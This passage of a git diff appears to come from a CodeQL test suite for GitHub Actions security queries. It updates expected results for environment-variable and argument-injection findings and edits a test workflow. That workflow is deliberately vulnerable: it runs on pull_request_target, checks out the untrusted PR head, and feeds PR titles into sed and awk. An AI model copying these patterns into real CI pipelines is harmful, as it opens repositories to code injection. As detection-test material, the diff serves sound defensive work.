"COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 82602ee8ed8..1ac092dd0d3 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,30 +1,29 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | Config | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -58,10 +57,10 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | @@ -72,5 +71,11 @@ nodes | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | semmle.label | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | semmle.label | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 09e540a0f1b..59ea1564bdd 100644 --- a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -1,15 +1,18 @@ name: Argument injection on: - issues: - types: [opened, edited] + pull_request_target: jobs: test1: runs-on: ubuntu-latest env: - TITLE: ${{github.event.issue.title}} + TITLE: ${{github.event.pull_request.title}} steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} - run: echo "s/FOO/$TITLE/g" - run: sed "s/FOO/$TITLE/g" - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar @@ -28,3 +31,6 @@ jobs: -e 's##${{ env.sot_repo }}#' \ -e 's##${TITLE}#' \ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + - run: | + BODY=$(git log --format=%s) + sed "s/FOO/$BODY/g" > /tmp/foo diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index b5df9a2cbd3..326cb935f7c 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected @@ -1,27 +1,30 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | -| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:18:14:18:52 